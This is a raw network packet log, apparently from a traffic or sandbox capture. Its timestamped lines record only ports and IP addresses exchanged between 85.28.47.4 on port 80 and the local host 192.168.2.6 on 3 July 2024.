                                                                Jul 3, 2024 08:38:17.691476107 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.691484928 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.691489935 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.691495895 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.691507101 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.691507101 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.691517115 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.691528082 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.691538095 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.691543102 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.691549063 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.691570997 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.691586018 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.773092031 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.773118019 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.773127079 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.773216963 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.773225069 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.773236036 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.773241043 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.773251057 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.773258924 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.773303032 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.773418903 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.773430109 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.773437023 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.773550034 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.773607016 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.773617029 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.773627996 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.773638010 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.773648024 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.773657084 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.773679018 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.773825884 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.773837090 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.773853064 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.773874044 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.773895979 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.774029970 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.774040937 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.774050951 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.774060965 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.774075985 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.774095058 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.774104118 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.774106026 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.774116039 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.774127007 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.774137020 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.774141073 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.774158955 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.774175882 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.774517059 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.774530888 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.774574041 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.774632931 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.774642944 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.774652958 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.774663925 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.774669886 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.774674892 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.774693012 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.774704933 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.774714947 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.774719000 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.774725914 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.774735928 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.774745941 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.774749041 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.774755955 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.774769068 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.774770975 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.774789095 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.774806976 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.775316954 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.775329113 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.775338888 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.775347948 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.775357962 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.775362968 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.775368929 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.775389910 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.775408030 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.874159098 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.879143953 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.049907923 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.049926996 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.049938917 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.049958944 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.049969912 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.049981117 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.049985886 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.049993038 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.050029039 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.050211906 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.050224066 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.050244093 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.050270081 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.050379992 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.050396919 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.050406933 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.050415993 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.050416946 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.050429106 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.050434113 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.050440073 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.050451040 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.050466061 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.050482988 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.050884962 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.050895929 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.050906897 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.050916910 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.050920010 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.050928116 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.050939083 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.050950050 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.050954103 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.050960064 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.050971031 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.050981045 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.050985098 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.050992012 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.051002026 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.051002026 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.051012039 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.051019907 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.051023006 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.051034927 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.051034927 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.051069021 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.051749945 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.051760912 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.051772118 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.051783085 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.051783085 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.051794052 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.051805019 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.051811934 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.051815033 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.051825047 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.051836014 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.051837921 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.051846027 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.051856041 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.051861048 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.051865101 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.051867008 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.051872015 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.051877022 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.051882029 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.051944017 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.052742958 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.052755117 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.052766085 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.052779913 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.052781105 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.052793980 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.052804947 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.052805901 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.052814960 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.052824974 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.052835941 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.052845955 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.052849054 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.052856922 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.052867889 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.052867889 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.052879095 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.052890062 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.052890062 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.052902937 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.052906990 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.052912951 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.052925110 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.052925110 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.052936077 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.052943945 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.052970886 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.053527117 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.053539991 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.053550005 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.053565025 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.053596020 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.053682089 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.053693056 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.053713083 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.053714037 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.053725004 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.053735971 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.053738117 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.053746939 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.053757906 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.053766012 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.053769112 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.053781986 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.053792953 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.053796053 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.053803921 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.053814888 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.053826094 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.053826094 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.053841114 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.053845882 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.053867102 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.054640055 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.054651976 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.054662943 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.054672956 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.054676056 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.054682970 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.054693937 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.054703951 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.054712057 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.054714918 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.054724932 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.054735899 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.054747105 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.054750919 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.054758072 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.054769039 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.054773092 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.054780006 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.054790974 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.054790974 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.054802895 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.054810047 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.054812908 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.054826975 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.054856062 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.055541992 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.055553913 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.055565119 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.055576086 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.055577993 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.055587053 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.055598021 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.055598974 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.055614948 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.055625916 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.055629969 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.055638075 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.055649996 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.055654049 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.055661917 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.055674076 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.055701971 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.139539003 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.139558077 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.139569044 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.139580965 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.139600039 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.139610052 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.139622927 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.139724016 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.139733076 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.139735937 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.139748096 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.139765024 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.139789104 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.139801025 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.139803886 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.139837027 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.139934063 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.139946938 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.139957905 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.139970064 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.139976978 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.139981985 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.139993906 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.140016079 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.140068054 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.140305042 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.140316010 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.140326977 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.140336990 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.140345097 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.140356064 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.140357018 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.140367031 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.140377998 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.140388966 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.140388966 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.140408993 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.140428066 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.140670061 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.140701056 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.140710115 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.140712023 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.140722990 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.140728951 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.140734911 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.140753031 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.140778065 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.140911102 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.140949011 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.141099930 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.141112089 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.141122103 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.141133070 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.141139030 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.141144037 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.141155958 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.141165972 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.141165972 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.141176939 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.141185045 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.141187906 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.141199112 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.141202927 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.141210079 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.141221046 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.141221046 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.141232967 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.141248941 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.141275883 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.141699076 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.141710997 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.141741991 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.141851902 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.141863108 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.141875982 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.141894102 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.141896009 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.141904116 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.141915083 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.141918898 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.141927004 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.141938925 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.141947031 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.141957998 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.141968966 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.141973972 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.141980886 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.141989946 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.142021894 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.142549992 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.142561913 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.142580032 CEST804971085.28.47.4192.168.2.6
